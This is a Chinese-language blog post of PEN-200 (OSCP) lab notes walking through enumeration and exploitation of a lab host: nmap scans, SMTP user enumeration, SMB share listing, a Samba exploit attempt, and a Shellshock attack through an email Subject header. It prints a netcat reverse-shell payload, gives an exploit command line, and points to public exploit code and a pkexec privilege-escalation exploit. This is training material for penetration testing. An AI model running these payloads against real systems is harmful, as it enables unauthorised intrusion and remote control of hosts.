【pen200lab】10.11.1.231

作者：mobiledu2502917123 | 来源：互联网 | 2023-09-15 11:13

pen200-lab学习笔记【pen200-lab】10.11.1.231🔥系列专栏：pen200-lab🎉欢迎关注🔎

pen200-lab 学习笔记

【pen200-lab】10.11.1.231

&＃x1f525;系列专栏&＃xff1a;pen200-lab
&＃x1f389;欢迎关注&＃x1f50e;点赞&＃x1f44d;收藏⭐️留言&＃x1f4dd;
&＃x1f4c6;首发时间&＃xff1a;&＃x1f334;2022年11月27日&＃x1f334;
&＃x1f36d;作者水平很有限&＃xff0c;如果发现错误&＃xff0c;还望告知&＃xff0c;感谢&＃xff01;

文章目录

pen200-lab 学习笔记
- 信息收集
- smtp
- rpc

信息收集

nmap -p- --min-rate 10000 -A 10.11.1.231

22/tcp open ssh OpenSSH 6.7p1 Debian 5&＃43;deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 b68d1ef380643f8a9652927a9fb1be67 (DSA) | 2048 72c406a72f711b6a6b57fecfad3f9c16 (RSA) |_ 256 6bc66efbba06dc23f93e01a62a87481a (ECDSA) 25/tcp open smtp Postfix smtpd | ssl-cert: Subject: commonName&＃61;localhost.localdomain | Not valid before: 2013-05-05T06:42:26 |_Not valid after: 2023-05-03T06:42:26 |_ssl-date: TLS randomness does not represent time |_smtp-commands: mail.local, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SECURITY) 445/tcp open netbios-ssn Samba smbd 4.2.10-Debian (workgroup: SECURITY)

鉴于它存在samba的版本问题&＃xff0c;我将首先尝试已知方法

use exploit/linux/samba/is_known_pipename set rhoat[靶机ip] run shell id

他也许不能成功&＃xff0c;所以我也不会放弃smb枚举
在这里插入图片描述是的&＃xff0c;它无法成功&＃xff0c;因为smb没有公开共享
而这个漏洞的利用条件就是需要一个共享目录可读可写

所以目前我将从rpc以及smtp中尝试枚举到一些信息
如果我获得一些凭据&＃xff0c;使我在smb中拥有可读写目录时&＃xff0c;我会继续尝试攻击

smtp

nmap --script smtp-enum-users 10.11.1.231 22/tcp open ssh 25/tcp open smtp | smtp-enum-users: |_ Method RCPT returned a unhandled status code. 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds

或者

smtp-user-enum -M VRFY -U [字典] -t 192.168.247.151 -M ---用于猜测用户名 EXPN、VRFY 或 RCPT 的方法&＃xff08;默认值&＃xff1a;VRFY&＃xff09; -U ---通过 smtp 服务检查的用户名文件 -t ---host 服务器主机运行 smtp 服务字典是这个&＃xff0c;也可以选取类似&＃xff1a; /usr/share/metasploit-framework/data/wordlists/unix_users.txt

得到了下面的很多用户

######## Scan started at Fri Dec 2 02:12:17 2022 ######### 10.11.1.231: avahi exists 10.11.1.231: avahi-autoipd exists 10.11.1.231: backup exists 10.11.1.231: bin exists 10.11.1.231: colord exists 10.11.1.231: daemon exists 10.11.1.231: ftp exists 10.11.1.231: games exists 10.11.1.231: gnats exists 10.11.1.231: hplip exists 10.11.1.231: irc exists 10.11.1.231: list exists 10.11.1.231: lp exists 10.11.1.231: mail exists 10.11.1.231: man exists 10.11.1.231: messagebus exists 10.11.1.231: news exists 10.11.1.231: nobody exists 10.11.1.231: postfix exists 10.11.1.231: postmaster exists 10.11.1.231: proxy exists 10.11.1.231: root exists 10.11.1.231: ROOT exists 10.11.1.231: saned exists 10.11.1.231: sshd exists 10.11.1.231: sync exists 10.11.1.231: sys exists 10.11.1.231: systemd-bus-proxy exists 10.11.1.231: systemd-timesync exists 10.11.1.231: systemd-resolve exists 10.11.1.231: systemd-network exists 10.11.1.231: uucp exists 10.11.1.231: uuidd exists 10.11.1.231: webmaster exists 10.11.1.231: www exists 10.11.1.231: www-data exists ######## Scan completed at Fri Dec 2 02:12:58 2022 #########

rpc

在这里插入图片描述
同样没有枚举出任何东西
仅仅存在空绑定

到目前为止&＃xff0c;我将继续仔细搜索smb的漏洞&＃xff0c;也许与上次的有所不同
在这里插入图片描述

得到的结果依旧是2017-7494

我还是要试试
首先我探索空绑定

smbclient -N -L //10.11.1.231

我很好奇为什么smbmap这里什么都没有
在这里插入图片描述于是我又尝试了一下smbmap

非常诧异
我将在tmp下继续枚举

smbclient -N //10.11.1.231/tmp

在这里插入图片描述

查看其他的两个共享目录
docs以及home全是空文件
不过docs看起来是一个文件
home全是user
又可能这是用户列表
user1-9 以及useradm

在这里插入图片描述到目前为止&＃xff0c;我们具有很多的用户&＃xff0c;但是没有密码

接着我在smb中枚举&＃xff0c;发现了log文件&＃xff0c;其中有意思的信息有下面两条&＃xff0c;这很敏感的将我指引到了shellshock

FROM&＃61; useradm&＃64;mail.local" "SUBJECT&＃61;() { :; };/bin/nc 192.168.119.221 4444 -e /bin/sh;" Subject:() { :; };/bin/nc 192.168.119.123 1234 -e /bin/sh;

我将在这里找到exp

https://gist.github.com/YSSVirus/0978adadbb8827b53065575bb8fbcb25

而后如此利用
就可以获得一个shell
而后我进行linpeas.sh枚举

python2 exp.py 10.11.1.231 useradm&＃64;mail.local 192.168.119.175 1234 useradm&＃64;mail.local

在这里插入图片描述

https://github.com/c3c/CVE-2021-4034

在这里找到对应版本即可
而后上传赋权利用即可

推荐阅读

copy
技术日志：Ansible的安装及模块管理详解

技术日志：Ansible的安装及模块管理详解 ... [详细]

蜡笔小新 2024-11-03 15:01:47
copy
如何安全地手动移除Exchange Server 2003以确保系统稳定性和数据完整性

本文详细介绍了如何安全地手动卸载Exchange Server 2003，以确保系统的稳定性和数据的完整性。根据微软官方支持文档（https://support.microsoft.com/kb833396/zh-cn），在进行卸载操作前，需要特别注意备份重要数据，并遵循一系列严格的步骤，以避免对现有网络环境造成不利影响。此外，文章还提供了详细的故障排除指南，帮助管理员在遇到问题时能够迅速解决，确保整个卸载过程顺利进行。 ... [详细]

蜡笔小新 2024-11-06 08:13:47
byte
Linux网络配置详解：Firewalld与Netfilter机制解析及iptables应用

在Linux系统中，网络配置是至关重要的任务之一。本文详细解析了Firewalld和Netfilter机制，并探讨了iptables的应用。通过使用`ip addr show`命令来查看网卡IP地址（需要安装`iproute`包），当网卡未分配IP地址或处于关闭状态时，可以通过`ip link set`命令进行配置和激活。此外，文章还介绍了如何利用Firewalld和iptables实现网络流量控制和安全策略管理，为系统管理员提供了实用的操作指南。 ... [详细]

蜡笔小新 2024-11-09 12:37:55
header
解决 Ubuntu 下 Samba 重新安装时配置文件未重新生成的问题

在 Ubuntu 中遇到 Samba 服务器故障时，尝试卸载并重新安装 Samba 发现配置文件未重新生成。本文介绍了解决该问题的方法。 ... [详细]

蜡笔小新 2024-11-12 13:02:23
header
在CentOS 7环境中安装配置Redis及使用Redis Desktop Manager连接时的注意事项与技巧

在 CentOS 7 环境中安装和配置 Redis 时，需要注意一些关键步骤和最佳实践。本文详细介绍了从安装 Redis 到配置其基本参数的全过程，并提供了使用 Redis Desktop Manager 连接 Redis 服务器的技巧和注意事项。此外，还探讨了如何优化性能和确保数据安全，帮助用户在生产环境中高效地管理和使用 Redis。 ... [详细]

蜡笔小新 2024-11-11 18:27:44
js
如何在Nginx服务器上轻松配置CertBot以实现SSL证书自动化管理

为了确保iOS应用能够安全地访问网站数据，本文介绍了如何在Nginx服务器上轻松配置CertBot以实现SSL证书的自动化管理。通过这一过程，可以确保应用始终使用HTTPS协议，从而提升数据传输的安全性和可靠性。文章详细阐述了配置步骤和常见问题的解决方法，帮助读者快速上手并成功部署SSL证书。 ... [详细]

蜡笔小新 2024-11-10 08:42:08
char
如何在Docker环境中高效利用数据库？ | Baeldung

在本文中，我们将探讨如何在Docker环境中高效地管理和利用数据库。首先，需要安装Docker Desktop以确保本地环境准备就绪。接下来，可以从Docker Hub中选择合适的数据库镜像，并通过简单的命令将其拉取到本地。此外，我们还将介绍如何配置和优化这些数据库容器，以实现最佳性能和安全性。 ... [详细]

蜡笔小新 2024-11-09 19:34:33
char
理解和优化进程与线程状态转换机制

在Cisco IOS XR系统中，存在提供服务的服务器和使用这些服务的客户端。本文深入探讨了进程与线程状态转换机制，分析了其在系统性能优化中的关键作用，并提出了改进措施，以提高系统的响应速度和资源利用率。通过详细研究状态转换的各个环节，本文为开发人员和系统管理员提供了实用的指导，旨在提升整体系统效率和稳定性。 ... [详细]

蜡笔小新 2024-11-09 18:33:35
char
在CentOS系统中安装Scrapy时常见的问题及解决方法

在 CentOS 7 系统中安装 Scrapy 时遇到了一些挑战。尽管 Scrapy 在 Ubuntu 上安装简便，但在 CentOS 7 上需要额外的配置和步骤。本文总结了常见问题及其解决方案，帮助用户顺利安装并使用 Scrapy 进行网络爬虫开发。 ... [详细]

蜡笔小新 2024-11-09 15:28:11
char
利用 ASP.NET 2.0 实现网站子域名功能详解

本文以 www.域名.com 为例，详细介绍如何为每个注册用户提供独立的二级域名，如 abc.域名.com。实现这一功能的核心步骤包括：首先，确保域名支持泛解析，即将 A 记录设置为 *.域名.com，以便将所有二级域名请求指向同一服务器。接着，在服务器端使用 ASP.NET 2.0 进行配置，通过解析 HTTP 请求中的主机头信息，动态识别并处理不同的二级域名，从而实现个性化内容展示。此外，还需在数据库中维护用户与二级域名的对应关系，确保每个用户的二级域名都能正确映射到其专属内容。 ... [详细]

蜡笔小新 2024-11-08 15:43:01
char
Linux chkconfig命令参数与使用方法深入解析

`chkconfig` 命令主要用于管理和查询系统服务在不同运行级别中的启动状态。该命令不仅能够更新服务的启动配置，还能检查特定服务的当前状态。通过 `chkconfig`，管理员可以轻松地控制服务在系统启动时的行为，确保关键服务正常运行，同时禁用不必要的服务以提高系统性能和安全性。本文将详细介绍 `chkconfig` 的各项参数及其使用方法，帮助读者更好地理解和应用这一强大的系统管理工具。 ... [详细]

蜡笔小新 2024-11-07 17:20:54
java
Java分层设计模式：详解与应用

在Java分层设计模式中，典型的三层架构（3-tier application）将业务应用细分为表现层（UI）、业务逻辑层（BLL）和数据访问层（DAL）。这种分层结构不仅有助于提高代码的可维护性和可扩展性，还能有效分离关注点，使各层职责更加明确。通过合理的设计和实现，三层架构能够显著提升系统的整体性能和稳定性。 ... [详细]

蜡笔小新 2024-11-07 17:14:51
java
每日前端实战：148# 视频教程展示纯 CSS 实现按钮两侧滑入装饰元素的悬停效果

通过点击页面右侧的“预览”按钮，您可以直接在当前页面查看效果，或点击链接进入全屏预览模式。该视频教程展示了如何使用纯 CSS 实现按钮两侧滑入装饰元素的悬停效果。视频内容具有互动性，观众可以实时调整代码并观察变化。访问以下链接体验完整效果：https://codepen.io/comehope/pen/yRyOZr。 ... [详细]

蜡笔小新 2024-11-07 14:24:29
java
SSH集成过程中常见问题及解决方案

在使用SSH框架进行项目开发时，经常会遇到一些常见的问题。例如，在Spring配置文件中配置AOP事务声明后，进行单元测试时可能会出现“No Hibernate Session bound to thread”的错误。本文将详细探讨这一问题的原因，并提供有效的解决方案，帮助开发者顺利解决此类问题。 ... [详细]

蜡笔小新 2024-11-07 03:17:49
java
Nmap端口检测与网络安全性评估

Nmap 是一款强大的网络扫描工具，能够高效地进行主机发现、端口扫描和服务识别。它不仅能够检测网络中活跃的主机，还能详细列出这些主机上开放的端口及其对应的服务和版本信息。此外，Nmap 还具备操作系统指纹识别和硬件地址探测功能，为网络安全评估提供了全面的数据支持。 ... [详细]

蜡笔小新 2024-10-29 16:33:30

mobiledu2502917123

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章